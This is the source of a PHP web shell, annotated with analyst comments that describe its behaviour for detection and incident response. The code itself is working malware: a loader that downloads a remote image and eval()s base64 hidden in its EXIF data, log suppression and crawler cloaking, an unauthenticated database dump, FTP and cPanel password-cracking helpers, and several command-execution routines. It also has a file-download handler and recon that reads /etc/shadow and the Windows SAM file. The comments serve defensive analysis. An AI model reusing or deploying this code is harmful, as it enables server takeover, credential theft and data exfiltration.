<?php
// Analyst note: this file is a PHP web shell (backdoor). The comments added throughout
// describe observed behaviour for detection and incident response; the code is untouched.
// Set Username & Password
// $pass is the only credential actually used: further down the shell compares the
// 'hacked' cookie against md5($pass) before exposing the file/DB/command UI.
$user = "hex";
$pass = "hex";

$malsite = "http://fightagent.ru"; // Malware Site -- IoC: remote host named by the shell

$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"

// Anti-forensics: error log/reporting switched off and execution limits lifted, so
// actions run through the shell leave no PHP error entries and never time out.
@set_magic_quotes_runtime(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Staged loader: on every request the script tries to fetch the JPEG below, takes its
// EXIF "UserComment" field, base64-decodes it and eval()s the result. The real payload
// is therefore NOT in this file; the URL, the outbound fetch to lh3.googleusercontent.com
// and the exif_read_data()+eval() pair are the indicators to hunt for.
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
// Crawler cloaking: a User-Agent matching one of these search engines gets a 404 so the
// shell is not indexed. This runs before any authentication.
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
 header('HTTP/1.0 404 Not Found');
 exit; }
}
// Dump Database
// Analyst note: this branch runs BEFORE the cookie-based password check further down,
// so it is reachable by anyone who sends action=dumpDB plus dbserver/dbuser/dbpass
// cookies. The full dump is written to Dump-<dbname>-<date>.sql in the script's working
// directory and never deleted -- an on-disk artifact worth collecting during IR.
// It relies on the mysql_* extension, which was removed in PHP 7.
if($_GET["action"] == "dumpDB")
{
 $self=$_SERVER["PHP_SELF"];
 if(isset($_COOKIE['dbserver']))
 {
 $date = date("Y-m-d");
 $dbserver = $_COOKIE["dbserver"];
 $dbuser = $_COOKIE["dbuser"];
 $dbpass = $_COOKIE["dbpass"];
 $dbname = $_GET['dbname'];
 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

 $file = "Dump-$dbname-$date";

 $file="Dump-$dbname-$date.sql";
 $fp = fopen($file,"w");

 // Appends to the dump file through the global handle opened above.
 function write($data)
 {
 global $fp;

 fwrite($fp,$data);

 }
 mysql_connect ($dbserver, $dbuser, $dbpass);
 mysql_select_db($dbname);
 $tables = mysql_query ("SHOW TABLES");
 // One CREATE TABLE statement followed by one INSERT per row, for every table.
 while ($i = mysql_fetch_array($tables))
 {
 $i = $i['Tables_in_'.$dbname];
 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
 write($create['Create Table'].";");
 $sql = mysql_query ("SELECT * FROM ".$i);
 if (mysql_num_rows($sql)) {
 while ($row = mysql_fetch_row($sql)) {
 foreach ($row as $j => $k) {
 $row[$j] = "'".mysql_escape_string($k)."'";
 }
 write("INSERT INTO $i VALUES(".implode(",", $row).");");
 }
 }
 }

 fclose ($fp);

 // Streams the finished file back to the requester as a download.
 header("Content-Disposition: attachment; filename=" . $file);
 header("Content-Type: application/download");
 header("Content-Length: " . filesize($file));
 flush();

 $fp = fopen($file, "r");
 while (!feof($fp))
 {
 echo fread($fp, 65536);
 flush();
 }
 fclose($fp);
 }
}
// Emits the inline stylesheet for the shell's UI (black background, red/lime text).
// The colour scheme and class names (.box, .sbox, .but, .myphp) are a usable
// fingerprint of this shell family in captured responses.
function shellstyle()
{
 echo "<style type=\"text/css\">
<!--

body,td,th {
 color: #FF0000;
 font-size: 14px;
}
input.but {
 background-color:#000000;
 color:#FF0000;
 border : 1px solid #1B1B1B;
}
a:link {
 color: #00FF00;
 text-decoration:none;
 font-weight:500;
}
a:hover {
 color:#00FF00;
 text-decoration:underline;
}
font.txt
{
 color: #00FF00;
 text-decoration:none;
 font-size:14px;
}
font.mainmenu
{
 color:#FF0000;
 text-decoration:none;
 font-size:14px;
}
a:visited {
 color: #006600;
}
input.box
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:400;
 border-radius:6px;
}
input.sbox
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:180;
 border-radius:6px;
}
select.sbox
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:180;
 border-radius:6px;
}
select.box
{
 background-color:#0C0C0C;
 color: lime;
 border : 1px solid #1B1B1B;
 -moz-border-radius:6px;
 width:400;
 border-radius:6px;
}

textarea.box
{
 border : 3px solid #111;
 background-color:#161616;
 color : lime;
 margin-top: 10px;
 -moz-border-radius:7px;
 border-radius:7px;
}
body {
 background-color:#000000;
}
.myphp table
{
 width:100%;
 padding:18px 10px;
 border : 1px solid #1B1B1B;
}
.myphp td
{
 background:#111111;
 color:#00ff00;
 padding:6px 8px;
 border-bottom:1px solid #222222;
 font-size:14px;
}
.myphp th, th
{
 background:#181818;

}
-->
</style>";
}
196if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
197{
198 $self=$_SERVER["PHP_SELF"];
199 $os = "N/D";
200 $bdmessage = null;
201 $dir = getcwd();
202
203 if(stristr(php_uname(),"Windows"))
204 {
205 $SEPARATOR = '\\';
206 $os = "Windows";
207 $directorysperator="\\";
208 }
209 else if(stristr(php_uname(),"Linux"))
210 {
211 $os = "Linux";
212 $directorysperator='/';
213 }
 // Returns $d with its last two components (split on $directsperator) removed;
 // used to build the ".." entry of the directory listing.
 function Trail($d,$directsperator)
 {
 $d=explode($directsperator,$d);
 array_pop($d);
 array_pop($d);
 $str=implode($d,$directsperator);
 return $str;
 }
222
 // Tests one username/password pair against an FTP host with curl (basic auth,
 // list-only). Prints a "success" line on a clean login and exits on timeout (errno 28).
 // Outbound FTP connections from the web server process are the observable here.
 // Note: as captured, the unescaped " after 'Username ' terminates the string literal,
 // so this line does not parse.
 function ftp_check($host,$user,$pass,$timeout)
 {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
 $data = curl_exec($ch);
 if ( curl_errno($ch) == 28 )
 {
 print "<center><b>
 Error : Connection Timeout.
 Please Check The Target Hostname .</b></center>";exit;
 }
 else if ( curl_errno($ch) == 0 )
 {
 print "<center><b>[~]</b><font class=txt>
 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
 }
 curl_close($ch);
 }
248
 // Same pattern as ftp_check() but over HTTP against $host:$cpanel_port (the port
 // comes from a global that is not defined in this part of the file). Prints a
 // "success" line when the basic-auth request returns without a curl error.
 // Note: as captured, the unescaped " after 'Username ' ends the string literal here too.
 function cpanel_check($host,$user,$pass,$timeout)
 {
 global $cpanel_port;
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
 $data = curl_exec($ch);
 if ( curl_errno($ch) == 28 )
 { print "<center><b>Error : Connection Timeout.
 Please Check The Target Hostname.</b></center>";exit;}
 else if ( curl_errno($ch) == 0 ){
 print "<ecnter><b>[~]</b><font class=txt><b>

 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
 }
 curl_close($ch);
 }
271
272 // Database functions
 // Renders the database browser: a "create database" form, then one row per database
 // reachable with the credentials in the dbserver/dbuser/dbpass cookies, with
 // Tables / Drop / Dump links. "Dump" points at the unauthenticated action=dumpDB
 // handler near the top of the file. Depends on the removed mysql_* extension.
 function listdatabase()
 {
 $self=$_SERVER["PHP_SELF"];
 ?>
 <br>
 <form>
 <table>
 <tr>
 <td><input type="text" class="box" name="dbname"></td>
 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
 </tr>
 </table>
 </form>
 <br>
 <?php
 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
 $result = mysql_query("SHOW DATABASE");
 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

 // Table count per database is obtained by selecting each DB and running SHOW TABLES.
 $pDB = mysql_list_dbs( $mysqlHandle );
 $num = mysql_num_rows( $pDB );
 for( $i = 0; $i < $num; $i++ )
 {
 $dbname = mysql_dbname( $pDB, $i );
 mysql_select_db($dbname,$mysqlHandle);
 $result = mysql_query("SHOW TABLES");
 $num_of_tables = mysql_num_rows($result);
 echo "<tr>\n";
 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
 echo "</tr>\n";
 }
 echo "</table>\n";
 mysql_close($mysqlHandle);
 }
310
 // Renders the table browser for $_GET['dbname']: create-table and free-form query
 // forms, then one row per table with Data / Schema / Empty / Drop links. The row
 // count per table is obtained by selecting every row of every table.
 // Depends on the removed mysql_* extension.
 function listtable()
 {
 $self=$_SERVER["PHP_SELF"];
 $dbserver = $_COOKIE["dbserver"];
 $dbuser = $_COOKIE["dbuser"];
 $dbpass = $_COOKIE["dbpass"];
 $dbname = $_GET['dbname'];
 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
 ?>
 <br><br>
 <form>
 <table>

 <tr>
 <td><input type="text" class="box" name="tablename"></td>
 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
 </tr>
 </table>

 <br>
 <form>
 <table>
 <tr>
 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
 </tr>
 <tr>
 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
 </tr>
 </table>
 </form>

 <?php

 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

 mysql_select_db($dbname);
 $pTable = mysql_list_tables( $dbname );

 if( $pTable == 0 ) {
 $msg = mysql_error();
 echo "<h3>Error : $msg</h3><p>\n";
 return;
 }
 $num = mysql_num_rows( $pTable );

 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

 for( $i = 0; $i < $num; $i++ )
 {
 $tablename = mysql_tablename( $pTable, $i );
 $result = mysql_query("select * from $tablename");
 $num_rows = mysql_num_rows($result);
 echo "<tr>\n";
 echo "<td>\n";
 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
 echo "</td>\n";
 echo "<td>\n";
 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
 echo "</td>\n";
 echo "<td>\n";
 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
 echo "</td>\n";
 echo "<td>\n";
 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
 echo "</td>\n";
 echo "<td>\n";
 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
 echo "</td>\n";
 echo "</tr>\n";
 }

 echo "</table></form>";
 mysql_close($mysqlHandle);
 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
 }
386
387
 // Prints a "label: value" line for the info panels; multi-line values go in a <pre>.
 // Nothing is printed when the trimmed value is falsy (so "0" is also suppressed).
 function paramexe($n, $v)
 {
 $v = trim($v);
 if($v)
 {
 echo '<span><font size=3>' . $n . ': </font></span>';
 if(strpos($v, "\n") === false)
 echo '<font size=2>' . $v . '</font><br>';
 else
 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
 }
 }
400
401
402
 // Recursively deletes a directory tree (the "Delete" bulk action for folders).
 // Destructive: unlink() on every file, then rmdir() bottom-up; no confirmation here.
 function rrmdir($dir)
 {
 if (is_dir($dir)) // ensures that we actually have a directory
 {
 $objects = scandir($dir); // gets all files and folders inside
 foreach ($objects as $object)
 {
 if ($object != '.' && $object != '..')
 {
 if (is_dir($dir . '/' . $object))
 {
 // if we find a directory, do a recursive call
 rrmdir($dir . '/' . $object);
 }
 else
 {
 // if we find a file, simply delete it
 unlink($dir . '/' . $object);
 }
 }
 }
 // the original directory is now empty, so delete it
 rmdir($dir);
 }
 }
428
 // Resolves a program name through `which` via execmd(); falls back to the bare name.
 // Note the argument is interpolated into the shell command unquoted.
 function which($pr)
 {
 $path = execmd("which $pr");
 if(!empty($path))
 return trim($path);
 else
 return trim($pr);
 }
437
 // Undoes magic_quotes_gpc escaping on request input (legacy PHP < 5.4 behaviour).
 function magicboom($text)
 {
 if (!get_magic_quotes_gpc())
 return $text;
 return stripslashes($text);
 }
444
// Command execution primitive. With the default $d_functions the command goes straight
// to passthru(); otherwise $d_functions is treated as the disable_functions list and the
// first exec-style function not named in it is used. Execution order tried:
// shell_exec, exec, passthru, system, popen, proc_open. Returns -1 when none worked.
// Detection: any of these functions being reached from a web-server-owned PHP process
// with attacker-supplied $cmd is the core capability of this shell.
function execmd($cmd,$d_functions="None")
{
 if($d_functions=="None")
 {
 $ret=passthru($cmd);
 return $ret;
 }
 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
 $d_functions=str_replace(" ","",$d_functions);
 $dis_funcs=explode(",",$d_functions);
 foreach($funcs as $safe)
 {
 if(!in_array($safe,$dis_funcs))
 {
 if($safe=="exec")
 {
 $ret=@exec($cmd);
 $ret=join("\n",$ret);
 return $ret;
 }
 elseif($safe=="system")
 {
 $ret=@system($cmd);
 return $ret;
 }
 elseif($safe=="passthru")
 {
 $ret=@passthru($cmd);
 return $ret;
 }
 elseif($safe=="shell_exec")
 {
 $ret=@shell_exec($cmd);
 return $ret;
 }
 elseif($safe=="popen")
 {
 $ret=@popen("$cmd",'r');
 if(is_resource($ret))
 {
 while(@!feof($ret))
 $read.=@fgets($ret);
 @pclose($ret);
 return $read;
 }
 return -1;
 }
 // Observed behaviour: `=` here is an assignment, so this branch is entered for any
 // $safe value that fell through the comparisons above (i.e. proc_open is always tried).
 elseif($safe="proc_open")
 {
 $cmdpipe=array(
 0=>array('pipe','r'),
 1=>array('pipe','w')
 );
 $resource=@proc_open($cmd,$cmdpipe,$pipes);
 if(@is_resource($resource))
 {
 while(@!feof($pipes[1]))
 $ret.=@fgets($pipes[1]);
 @fclose($pipes[1]);
 @proc_close($resource);
 return $ret;
 }
 return -1;
 }
 }
 }
 return -1;
}
513
 // Returns the PHP disable_functions setting, or the string "None" when it is empty.
 // The result is what execmd() uses to pick a working exec primitive.
 function getDisabledFunctions()
 {
 if(!ini_get('disable_functions'))
 {
 return "None";
 }
 else
 {
 return @ini_get('disable_functions');
 }
 }
525
 // Formats fileperms() as an ls-style string ("-rwxr-x---"); this is the well-known
 // snippet from the PHP manual's fileperms() page. Type character first, then
 // owner/group/world triplets with setuid/setgid/sticky folded into the x position.
 function getFilePermissions($file)
 {
 $perms = fileperms($file);

 if (($perms & 0xC000) == 0xC000) {
 // Socket
 $info = 's';
 } elseif (($perms & 0xA000) == 0xA000) {
 // Symbolic Link
 $info = 'l';
 } elseif (($perms & 0x8000) == 0x8000) {
 // Regular
 $info = '-';
 } elseif (($perms & 0x6000) == 0x6000) {
 // Block special
 $info = 'b';
 } elseif (($perms & 0x4000) == 0x4000) {
 // Directory
 $info = 'd';
 } elseif (($perms & 0x2000) == 0x2000) {
 // Character special
 $info = 'c';
 } elseif (($perms & 0x1000) == 0x1000) {
 // FIFO pipe
 $info = 'p';
 } else {
 // Unknown
 $info = 'u';
 }

 // Owner
 $info .= (($perms & 0x0100) ? 'r' : '-');
 $info .= (($perms & 0x0080) ? 'w' : '-');
 $info .= (($perms & 0x0040) ?
 (($perms & 0x0800) ? 's' : 'x' ) :
 (($perms & 0x0800) ? 'S' : '-'));

 // Group
 $info .= (($perms & 0x0020) ? 'r' : '-');
 $info .= (($perms & 0x0010) ? 'w' : '-');
 $info .= (($perms & 0x0008) ?
 (($perms & 0x0400) ? 's' : 'x' ) :
 (($perms & 0x0400) ? 'S' : '-'));

 // World
 $info .= (($perms & 0x0004) ? 'r' : '-');
 $info .= (($perms & 0x0002) ? 'w' : '-');
 $info .= (($perms & 0x0001) ?
 (($perms & 0x0200) ? 't' : 'x' ) :
 (($perms & 0x0200) ? 'T' : '-'));

 return $info;
}
 // Wraps getFilePermissions() in a colour: red = not readable by the PHP user,
 // white = readable but not writable, green = writable. The listing uses this to
 // highlight where the web-server user can write.
 function filepermscolor($filename)
 {
 if(!@is_readable($filename))
 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
 else if(!@is_writable($filename))
 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
 else
 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
 }
588
 // Prints the requester's IP as seen by the server (REMOTE_ADDR).
 function yourip()
 {
 echo $_SERVER["REMOTE_ADDR"];
 }
 // Prints the running PHP version.
 function phpver()
 {
 $pv=@phpversion();
 echo $pv;
 }
 // Prints whether magic_quotes_gpc is on (legacy PHP setting).
 function magic_quote()
 {
 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
 }
 // Prints the server's own address from the SERVER_ADDR environment variable.
 function serverip()
 {
 echo getenv('SERVER_ADDR');
 }
 // Prints the port the request arrived on.
 function serverport()
 {
 echo $_SERVER['SERVER_PORT'];
 }
 // Reports safe_mode status from the global $sm (set elsewhere in the file, not visible
 // here); the shell treats safe mode as a blocker for most of its features.
 function safe()
 {
 global $sm;
 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
 }
 // Prints the SERVER_ADMIN contact configured on the web server.
 function serveradmin()
 {
 echo $_SERVER['SERVER_ADMIN'];
 }
 // Prints the uname string (OS, hostname, kernel release).
 function systeminfo()
 {
 echo php_uname();
 }
 // Capability probe: is the curl extension available (needed by ftp_check/cpanel_check).
 function curlinfo()
 {
 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
 }
 // Capability probe: Oracle client functions present?
 function oracleinfo()
 {
 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
 }
 // Capability probe: legacy mysql_* extension present (the DB features need it).
 function mysqlinfo()
 {
 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
 }
 // Capability probe: MSSQL client functions present?
 function mssqlinfo()
 {
 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
 }
 // Capability probe: PostgreSQL client functions present?
 function postgresqlinfo()
 {
 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
 }
 // Prints the web server software banner.
 function softwareinfo()
 {
 echo getenv("SERVER_SOFTWARE");
 }
 // File exfiltration handler for ?download=<path>. The loop keeps only the final
 // "/"-separated component of the requested path, so the readfile() below is relative
 // to the script's working directory. Output buffers are cleared first so the raw
 // bytes are sent as an attachment; the request then exits.
 function download()
 {
 $frd=$_GET['download'];
 $prd=explode("/",$frd);
 for($i=0;$i<sizeof($prd);$i++)
 {
 $nfd=$prd[$i];
 }
 @ob_clean();
 header("Content-type: application/octet-stream");
 header("Content-length: ".filesize($nfd));
 header("Content-disposition: attachment; filename=\"".$nfd."\";");
 readfile($nfd);

 exit;

 }
664
 // Formats a byte count with binary units (B, KB, MB, ...), two decimals.
 function HumanReadableFilesize($size)
 {
 $mod = 1024;
 $units = explode(' ','B KB MB GB TB PB');
 for ($i = 0; $size > $mod; $i++)
 {
 $size /= $mod;
 }
 return round($size, 2) . ' ' . $units[$i];
 }
675
 // Windows helper: probes A:\ through Z:\ with is_dir() and emits a link for each
 // drive that exists, wired to the client-side changedir() handler.
 function showDrives()
 {
 global $self;
 foreach(range('A','Z') as $drive)
 {
 if(is_dir($drive.':\\'))
 {
 $myd = $drive.":\\";
 ?>
 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
 <?php echo $myd; ?>
 </a>
 <?php
 }
 }
 }
 // Total size of the filesystem holding "/" (bytes).
 function diskSpace()
 {
 return disk_total_space("/");
 }
 // Free space on the filesystem holding "/" (bytes).
 function freeSpace()
 {
 return disk_free_space("/");
 }
700
 // Returns the output of `which <name>` via myexe(), or false when nothing is found.
 // mysecinfo() calls this once per tool name, so a burst of `which` executions from
 // the web-server process is a practical detection signal for this recon step.
 function thiscmd($p)
 {
 $path = myexe('which ' . $p);
 if(!empty($path))
 return $path;
 return false;
 }
708
 // Host reconnaissance panel. Linux branch: distro/kernel/CPU/RAM/mounts, whether
 // /etc/passwd and /etc/shadow are readable by the PHP user, and which compilers,
 // interpreters, downloaders and -- under "Danger" -- AV/HIDS/firewall tools are
 // installed. Windows branch: links to %WINDIR%\repair\sam and the hosts/networks/
 // lmhosts files, plus `ver`, `net accounts`, `net user`. Every myexe()/thiscmd()
 // call here is a child process spawned by the web server: good EDR/auditd material.
 // Note: myparam() is defined inside this function, so a second call would redeclare it.
 function mysecinfo()
 {
 function myparam($n, $v)
 {
 $v = trim($v);
 if($v)
 {
 echo '<span><font color =red size=3>' . $n . ': </font></span>';
 if(strpos($v, "\n") === false)
 echo '<font color =lime size=3>' . $v . '</font><br>';
 else
 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
 }
 }

 myparam('Server software', @getenv('SERVER_SOFTWARE'));
 if(function_exists('apache_get_modules'))
 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
 myparam('Open base dir', @ini_get('open_basedir'));
 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 $temp=array();
 if(function_exists('mysql_get_client_info'))
 $temp[] = "MySql (".mysql_get_client_info().")";
 if(function_exists('mssql_connect'))
 $temp[] = "MSSQL";
 if(function_exists('pg_connect'))
 $temp[] = "PostgreSQL";
 if(function_exists('oci_connect'))
 $temp[] = "Oracle";
 myparam('Supported databases', implode(', ', $temp));
 echo '<br>';

 if($GLOBALS['os'] == 'Linux') {
 myparam('Distro : ', myexe("cat /etc/*-release"));
 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
 myparam('OS version', @file_get_contents('/proc/version'));
 myparam('Distr name', @file_get_contents('/etc/issue.net'));
 myparam('Where is Perl?', myexe('whereis perl'));
 myparam('Where is Python?', myexe('whereis python'));
 myparam('Where is gcc?', myexe('whereis gcc'));
 myparam('Where is apache?', myexe('whereis apache'));
 myparam('CPU?', myexe('cat /proc/cpuinfo'));
 myparam('RAM', myexe('free -m'));
 myparam('Mount options', myexe('cat /etc/fstab'));
 myparam('User Limits', myexe('ulimit -a'));


 // Tool inventory: "Danger" is the list of security products the operator wants to
 // know about; its presence in a response body is itself a fingerprint of this shell.
 if(!$GLOBALS['safe_mode']) {
 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 echo '<br>';
 $temp=array();
 foreach ($userful as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Userful', implode(', ',$temp));
 $temp=array();
 foreach ($danger as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Danger', implode(', ',$temp));
 $temp=array();
 foreach ($downloaders as $item)
 if(thiscmd($item))
 $temp[] = $item;
 myparam('Downloaders', implode(', ',$temp));
 echo '<br/>';
 myparam('HDD space', myexe('df -h'));
 myparam('Hosts', @file_get_contents('/etc/hosts'));

 }
 } else {
 // The "Password File" link hands %WINDIR%\repair\sam to the download() handler.
 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
 myparam('OS Version',myexe('ver'));
 myparam('Account Settings',myexe('net accounts'));
 myparam('User Accounts',myexe('net user'));
 }
 echo '</div>';
 }
798
799
800
 // Second command-execution primitive (used by the recon helpers). Tries, in order,
 // exec, passthru, system, shell_exec and finally popen, capturing stdout via output
 // buffering where the function prints instead of returning. Returns '' when no
 // primitive is available. Errors are suppressed with @ throughout.
 function myexe($in)
 {
 $out = '';
 if (function_exists('exec')) {
 @exec($in,$out);
 $out = @join("\n",$out);
 } elseif (function_exists('passthru')) {
 ob_start();
 @passthru($in);
 $out = ob_get_clean();
 } elseif (function_exists('system')) {
 ob_start();
 @system($in);
 $out = ob_get_clean();
 } elseif (function_exists('shell_exec')) {
 $out = shell_exec($in);
 } elseif (is_resource($f = @popen($in,"r"))) {
 $out = "";
 while(!@feof($f))
 $out .= fread($f,1024);
 pclose($f);
 }
 return $out;
}
825
 // Third command-execution primitive. Order tried: exec, shell_exec, popen, system,
 // passthru, proc_open. Unlike execmd()/myexe() the result is passed through
 // htmlspecialchars() before return, so this is the one meant for display in the UI.
 // Note: the proc_open branch closes its handle with pclose() rather than proc_close().
 function exec_all($command)
 {

 $output = '';
 if(function_exists('exec'))
 {
 exec($command,$output);
 $output = join("\n",$output);
 }

 else if(function_exists('shell_exec'))
 {
 $output = shell_exec($command);
 }

 else if(function_exists('popen'))
 {
 $handle = popen($command , "r"); // Open the command pipe for reading
 if(is_resource($handle))
 {
 if(function_exists('fread') && function_exists('feof'))
 {
 while(!feof($handle))
 {
 $output .= fread($handle, 512);
 }
 }
 else if(function_exists('fgets') && function_exists('feof'))
 {
 while(!feof($handle))
 {
 $output .= fgets($handle,512);
 }



 }
 }
 pclose($handle);
 }


 else if(function_exists('system'))
 {
 ob_start(); //start output buffering
 system($command);
 $output = ob_get_contents(); // Get the output
 ob_end_clean(); // Stop output buffering
 }

 else if(function_exists('passthru'))
 {
 ob_start(); //start output buffering
 passthru($command);
 $output = ob_get_contents(); // Get the output
 ob_end_clean(); // Stop output buffering
 }

 else if(function_exists('proc_open'))
 {
 $descriptorspec = array(
 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
 );
 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
 if(is_resource($handle))
 {
 if(function_exists('fread') && function_exists('feof'))
 {
 while(!feof($pipes[1]))
 {
 $output .= fread($pipes[1], 512);
 }
 }
 else if(function_exists('fgets') && function_exists('feof'))
 {
 while(!feof($pipes[1]))
 {
 $output .= fgets($pipes[1],512);
 }
 }
 }
 pclose($handle);
 }

 return(htmlspecialchars($output));

}
913
// Status strings for the info panel: open_basedir on/off and whether the PHP user can
